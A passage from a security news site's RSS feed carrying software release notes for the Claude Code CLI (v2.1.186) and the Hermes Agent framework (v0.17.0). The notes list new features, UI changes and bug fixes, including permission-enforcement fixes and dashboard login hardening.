<content:encoded><![CDATA[Complete guide to Linux backup tools in 2026. Covers Timeshift system snapshots, rsync incremental backups, Borg encrypted deduplication, and Restic cross-platform backups. Includes verified commands for Ubuntu, Fedora, and Arch Linux, plus a tested 3-2-1 backup strategy with systemd automation.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.186]]></title>
<description><![CDATA[What's changed

Added claude mcp login  and claude mcp logout  to authenticate MCP servers from the CLI without opening the interactive /mcp menu, with --no-browser stdin redirect support for completing over SSH
Added status filtering (press f) to the /workflows agent detail view
Added a "Skills"...]]></description>
<link>https://tsecurity.de/de/3616627/downloads/v21186/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616627/downloads/v21186/</guid>
<pubDate>Mon, 22 Jun 2026 23:02:19 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>claude mcp login &lt;name&gt;</code> and <code>claude mcp logout &lt;name&gt;</code> to authenticate MCP servers from the CLI without opening the interactive <code>/mcp</code> menu, with <code>--no-browser</code> stdin redirect support for completing over SSH</li>
<li>Added status filtering (press <code>f</code>) to the <code>/workflows</code> agent detail view</li>
<li>Added a "Skills" section to the <code>/plugin</code> Installed tab</li>
<li>Added <code>teammateMode: "iterm2"</code> setting with a warning when auto mode cannot find the <code>it2</code> CLI</li>
<li>Added "Claude Platform on AWS - refresh credentials" option to <code>/login</code> when <code>awsAuthRefresh</code> is configured</li>
<li><code>!</code> bash commands now trigger Claude to respond to the output automatically; set <code>"respondToBashCommands": false</code> in settings.json to keep the previous context-only behavior</li>
<li>Fixed streaming requests failing with "Content block not found" or JSON parse errors after the machine wakes from sleep</li>
<li>Fixed subagent transcript scroll position bleeding into the main transcript on exit</li>
<li>Fixed background task previews flashing raw tool names before the agent's plan loaded</li>
<li>Fixed Chrome tab-group isolation not applying when the in-product permissions gate is off for concurrent CLI sessions</li>
<li>Fixed background session recaps being duplicated; the agent's own end-of-turn summary now shows as the recap line</li>
<li>Fixed opening a background session from <code>claude agents</code> leaving the previous screen painted behind it</li>
<li>Fixed <code>Agent(type)</code> deny rules and <code>Agent(x,y)</code> allowed-types restrictions not being enforced for named subagent spawns</li>
<li>Fixed Esc and Ctrl+C not responding while background agents are still running after the main turn ends</li>
<li>Fixed misaligned option numbers in permission prompts when the option text overflows</li>
<li>Fixed pressing <code>x</code> on a finished subagent in the agent panel not dismissing it</li>
<li>Fixed a misleading "MCP server disconnected" notice for intentionally retired tools when resuming older sessions</li>
<li>Fixed <code>/plugin</code> Installed showing a "more above" indicator when already scrolled to the top</li>
<li>Fixed <code>~~strikethrough~~</code> showing literal tildes in assistant messages instead of rendering as strikethrough</li>
<li>Fixed <code>--tools</code> allowing feature-gated tools to slip through before flags loaded on a cold first launch</li>
<li>Fixed background job status in <code>claude agents</code> showing a stale "needs input" message after replying</li>
<li>Fixed a dark-theme flash when opening a background session from <code>claude agents</code> on a light terminal</li>
<li>Fixed mouse-selected text staying highlighted after deleting it in <code>claude agents</code></li>
<li>Fixed session cost not showing for usage-based Enterprise and Team subscribers</li>
<li>Fixed agent teams: teammates spawned via tmux/pane backends now inherit the leader's <code>--effort</code> level</li>
<li>Fixed Workflow <code>agent({schema})</code> subagents looping forever on repeated schema validation failures instead of aborting after 5 attempts</li>
<li>Improved <code>claude mcp get</code> and <code>claude mcp remove</code> to suggest the closest configured server name on a typo and truncate long server lists</li>
<li>Improved memory: the agent is now reminded to compact its <code>MEMORY.md</code> index when nearing the size limit</li>
<li>Improved skill frontmatter: <code>display-name</code>, <code>default-enabled</code>, <code>fallback</code>, and <code>metadata.*</code> keys now accept kebab-case, snake_case, and camelCase</li>
<li>Improved malformed <code>SKILL.md</code> YAML frontmatter handling: loads the skill body with empty metadata instead of failing silently</li>
<li>Changed <code>CLAUDE_CODE_MAX_RETRIES</code> to cap at 15; for unattended sessions, use <code>CLAUDE_CODE_RETRY_WATCHDOG</code> instead</li>
<li>Changed background subagents to surface permission prompts in the main session instead of auto-denying; the dialog shows which agent is asking, and Esc denies just that tool</li>
<li>Changed <code>/review &lt;pr&gt;</code> to use the same review engine as <code>/code-review medium</code></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.17.0 (v2026.6.19)]]></title>
<description><![CDATA[Hermes Agent v0.17.0 (v2026.6.19)
Release Date: June 19, 2026
Since v0.16.0: ~1,475 commits · ~800 merged PRs · 1,693 files changed · 235,390 insertions · 50,730 deletions · 300+ issues closed · 245 community contributors

The Reach Release. v0.16.0 put Hermes on your desktop. v0.17.0 is about ho...]]></description>
<link>https://tsecurity.de/de/3611226/downloads/hermes-agent-v0170-v2026619/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611226/downloads/hermes-agent-v0170-v2026619/</guid>
<pubDate>Fri, 19 Jun 2026 21:46:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.17.0 (v2026.6.19)</h1>
<p><strong>Release Date:</strong> June 19, 2026<br>
<strong>Since v0.16.0:</strong> ~1,475 commits · ~800 merged PRs · 1,693 files changed · 235,390 insertions · 50,730 deletions · 300+ issues closed · 245 community contributors</p>
<blockquote>
<p><strong>The Reach Release.</strong> v0.16.0 put Hermes on your desktop. v0.17.0 is about how far that reach extends — across new places to talk to it, deeper into the tools you already use, and out to the people running Hermes for a team. Hermes reached two new channels (iMessage via Photon, and the Raft agent network), the desktop app gained substantial new capability, subagents can now run in the background, image generation learned to edit, and Cursor's Composer model is reachable through an xAI Grok subscription. The dashboard got a full profile builder and secure login, the Skills Hub browser was rehauled, the <code>memory</code> tool got a major upgrade, and the curator stopped spending aux-model budget on every routine run. 300+ issues closed ride along, plus a security round.</p>
</blockquote>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Hermes reaches iMessage — Photon Spectrum, no Mac relay required</strong> — There's now an iMessage platform plugin built on Photon's managed line pool. Run <code>hermes photon login</code>, authenticate with a device code, and Hermes can send and receive iMessage — no Mac sitting in a closet running a relay, no BlueBubbles bridge to babysit. It's positioned as the successor to BlueBubbles: free to start, nothing to self-host. If your friends and family live in the blue bubbles, Hermes lives there now too. (<a href="https://github.com/NousResearch/hermes-agent/pull/32348" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32348/hovercard">#32348</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42582/hovercard">#42582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44713" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44713/hovercard">#44713</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Raft — Hermes joins the Raft agent network as a gateway channel</strong> — A new bundled Raft platform adapter lets Hermes connect to <a href="https://raft.build/" rel="nofollow">Raft</a> as an external agent through a wake-channel bridge. Set <code>RAFT_PROFILE</code>, run the bridge, and Raft can wake Hermes to handle messages — with a privacy-by-contract design where wake payloads carry only metadata (event IDs, timestamps), never message bodies. Another surface where Hermes can show up and do work. (<a href="https://github.com/NousResearch/hermes-agent/pull/48210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48210/hovercard">#48210</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxchan">@xxchan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>A substantially more capable desktop app</strong> — v0.16.0 shipped the desktop app; v0.17.0 deepened it across dozens of PRs. Rebindable keyboard shortcuts, native OS notifications with per-type toggles, live subagent <strong>watch-windows</strong> that stream a delegated agent's activity into its own pane, a composer model selector with per-model presets, automatic RTL/bidi text direction, a resizable VS Code-themed terminal pane, per-thread composer drafts, and the ability to install <strong>any VS Code Marketplace theme</strong> directly into the app. The desktop is now a serious daily driver, not a preview. (<a href="https://github.com/NousResearch/hermes-agent/pull/45866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45866/hovercard">#45866</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40660/hovercard">#40660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46959" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46959/hovercard">#46959</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43292/hovercard">#43292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44596" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44596/hovercard">#44596</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Background / async subagents — delegate work and keep going</strong> — <code>delegate_task(background=true)</code> now dispatches a subagent that runs in the background and returns a handle immediately. You and the model keep working while it churns, and the full result re-enters the conversation as a new turn the moment it finishes. Kick off a long research dive or a multi-step build, then carry on with something else instead of sitting blocked waiting on it. (<a href="https://github.com/NousResearch/hermes-agent/pull/40946" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40946/hovercard">#40946</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46968" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46968/hovercard">#46968</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Edit images, not just generate them — image-to-image in <code>image_generate</code></strong> — <code>image_generate</code> can now edit and transform a source image, not only create one from scratch. Pass an existing image and a prompt and it routes to the backend's edit endpoint (same tool, same pattern as <code>video_generate</code>), across every supported image provider. "Make this logo blue," "remove the background," "turn this sketch into a render" — all from the tool you already use. (<a href="https://github.com/NousResearch/hermes-agent/pull/48705" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48705/hovercard">#48705</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Automation Blueprints — schedule things without learning cron</strong> — Pick an automation by name and Hermes asks you for what it needs — no cron syntax, no <code>slot=value</code> typing. One blueprint definition renders natively on every surface: a form in the dashboard, a slash command in the CLI/TUI/messenger, a conversation with the agent, an entry in the docs catalog. "Daily news briefing at 8am" becomes a thing you set up by answering questions, not by memorizing <code>0 8 * * *</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/41309" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41309/hovercard">#41309</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Cursor's Composer model, through your xAI Grok subscription</strong> — <code>grok-composer-2.5-fast</code> is now in the xAI OAuth model picker, with its context window reconciled to the full 200k. Composer is the fast coding model behind Cursor — and if you have an xAI Grok subscription, you can now point Hermes at it directly over OAuth, no separate API key. Your Grok plan, Hermes's agent loop, Composer's coding speed. (<a href="https://github.com/NousResearch/hermes-agent/pull/47908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47908/hovercard">#47908</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47371/hovercard">#6f89e17</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Full profile builder in the dashboard</strong> — Build a complete Hermes profile from the browser — pick its model, choose its skills, attach its MCP servers — without hand-editing <code>config.yaml</code>. The dashboard also unified multi-profile management into one machine-wide view with a global profile switcher, so you manage every profile from a single place. (<a href="https://github.com/NousResearch/hermes-agent/pull/39084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39084/hovercard">#39084</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44007/hovercard">#44007</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Skills Hub browser rehaul</strong> — The dashboard's Skills Hub got a ground-up rework: connected hubs, a Featured section, full skill previews before you install, and a security scan on each skill. Browsing and installing skills from the trusted taps (OpenAI, Anthropic, HuggingFace, NVIDIA) is now a real browsing experience, not a flat list. (<a href="https://github.com/NousResearch/hermes-agent/pull/40384" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40384/hovercard">#40384</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43398/hovercard">#43398</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The <code>memory</code> tool got a major upgrade — atomic batch operations</strong> — The <code>memory</code> tool gained an <code>operations</code> array that applies a batch of add/replace/remove edits <strong>atomically against the final character budget</strong>. The model can free up space and add new entries in a single call — even when an add alone would overflow the budget — collapsing what used to be a fragile multi-turn dance into one reliable operation. Memory updates are now faster and far less likely to fail mid-edit. (<a href="https://github.com/NousResearch/hermes-agent/pull/48507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48507/hovercard">#48507</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Secure dashboard login</strong> — The dashboard's authentication was hardened: every token-required endpoint now correctly returns 401 behind the OAuth gate, websocket auth uses the served dashboard token, and a warning fires when a <code>public_url</code> override is silently rejected. Exposing your dashboard to the network is safer by default. (<a href="https://github.com/NousResearch/hermes-agent/pull/42578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42578/hovercard">#42578</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43214/hovercard">#42578</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Official WhatsApp Business Cloud API adapter</strong> — Alongside the existing Baileys bridge, Hermes now speaks the <strong>official</strong> WhatsApp Business Cloud API — Meta's first-party, hosted, no-bridge-process path. Point it at your Business API credentials and Hermes talks WhatsApp through the supported channel, with no QR-scanning bridge process to keep alive. (<a href="https://github.com/NousResearch/hermes-agent/pull/44331" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44331/hovercard">#44331</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43921" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43921/hovercard">#43921</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Rich text for Telegram — Bot API 10.1 rich messages</strong> — Telegram replies now render as proper rich messages via Bot API 10.1: better formatting, cleaner long-message handling, native markup instead of flattened text. It's on by default with an opt-out, so your Telegram conversations look the way they should without any configuration. (<a href="https://github.com/NousResearch/hermes-agent/pull/44829" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44829/hovercard">#44829</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45584/hovercard">#45584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45953" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45953/hovercard">#45953</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Curator cost optimization — no aux-model spend on routine runs</strong> — The skill curator now prunes stale skills by default but no longer runs its LLM-powered consolidation pass unless you opt in (<code>curator.consolidate: true</code> or <code>hermes curator run --consolidate</code>). The deterministic inactivity sweep keeps running for free; the opinionated, aux-model-spending "build umbrella skills" fork is now off by default. Routine background curation costs you <strong>zero tokens</strong>. (<a href="https://github.com/NousResearch/hermes-agent/pull/47840" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47840/hovercard">#47840</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
</ul>
<h2>🖥️ Hermes Desktop App</h2>
<h3>New surfaces &amp; UX</h3>
<ul>
<li>Rebindable keyboard shortcuts panel; native OS notifications with per-type toggles; curated turn-completion cue + dismissable error banners (<a href="https://github.com/NousResearch/hermes-agent/pull/40660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40660/hovercard">#40660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45866/hovercard">#45866</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42480" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42480/hovercard">#42480</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47985" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47985/hovercard">#47985</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Live subagent <strong>watch-windows</strong> — stream a delegated agent's activity into its own pane; composer status stack + editable prompts; open any chat in its own window; new-session-in-compact-window hotkey (<a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44630" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44630/hovercard">#44630</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43219" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43219/hovercard">#43219</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46951" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46951/hovercard">#46951</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Composer model selector + per-model presets + external-provider disconnect; surface every provider/model from <code>hermes model</code> in the GUI; unify provider list to one source; warn when a main-model switch leaves auxiliary tasks pinned elsewhere (<a href="https://github.com/NousResearch/hermes-agent/pull/46959" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46959/hovercard">#46959</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40563" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40563/hovercard">#40563</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49080" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49080/hovercard">#49080</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40286/hovercard">#40286</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Install <strong>any VS Code Marketplace theme</strong>; assignable themes per profile; window translucency slider; unified overlay design system + BrandMark + onboarding redesign (<a href="https://github.com/NousResearch/hermes-agent/pull/43292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43292/hovercard">#43292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42286/hovercard">#42286</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45086" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45086/hovercard">#45086</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40708" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40708/hovercard">#40708</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Resizable VS Code-themed terminal pane + palette polish; auto-detect RTL/bidi text direction in chat; Mac-style session switcher (^Tab / ^1-9); worktree-aware sidebar grouping; hover-reveal collapsed sidebars; messaging source folders in sidebar (<a href="https://github.com/NousResearch/hermes-agent/pull/42521" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42521/hovercard">#42521</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44596" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44596/hovercard">#44596</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43111" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43111/hovercard">#43111</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45273/hovercard">#45273</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41670" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41670/hovercard">#41670</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41751" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41751/hovercard">#41751</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Arrow-key history + queue editing in composer; expand full command inline from the approval bar; follow-streaming-at-bottom + jump-to-bottom button; first-class cron jobs in the sidebar + dashboard scheduler (<a href="https://github.com/NousResearch/hermes-agent/pull/40234" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40234/hovercard">#40234</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44864/hovercard">#44864</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45263" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45263/hovercard">#45263</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40684" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40684/hovercard">#40684</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Desktop pets — pop-out overlay + notifications (<a href="https://github.com/NousResearch/hermes-agent/pull/47938" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47938/hovercard">#47938</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Full tool-backend config (pickers + per-backend settings) in Settings; run tool-backend post-setup installs from the GUI; uninstall the Chat GUI without removing the agent; Shift+click status-bar zap to toggle YOLO globally; <code>/browser connect</code> on a local gateway (<a href="https://github.com/NousResearch/hermes-agent/pull/41232" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41232/hovercard">#41232</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40559" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40559/hovercard">#40559</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40355/hovercard">#40355</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41666" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41666/hovercard">#41666</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47245/hovercard">#47245</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Japanese + Traditional Chinese language switching (<a href="https://github.com/NousResearch/hermes-agent/pull/40114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40114/hovercard">#40114</a>)</li>
<li>"Restart gateway" action (renamed from "Restart messaging") surfaced in the statusbar + on messaging save/toggle toasts; rendered logs are selectable/copyable (<a href="https://github.com/NousResearch/hermes-agent/pull/49094" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49094/hovercard">#49094</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Remote-gateway &amp; multi-profile</h3>
<ul>
